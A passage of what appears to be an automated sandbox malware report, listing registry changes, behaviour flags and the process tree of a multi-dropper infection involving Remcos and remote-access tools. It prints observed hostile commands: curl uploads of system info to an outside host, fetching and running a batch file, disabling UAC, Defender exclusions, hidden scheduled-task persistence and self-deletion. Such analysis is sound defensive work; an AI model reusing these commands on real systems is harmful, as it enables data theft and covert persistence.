| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = (binary data omitted) | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\Windows Error Reporting\LastCrashSelfReportTime = "133785014207490496" | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ruts\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\FCTR16PHVKF3" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\0RQI589Z58YU" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp1D83.tmp"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
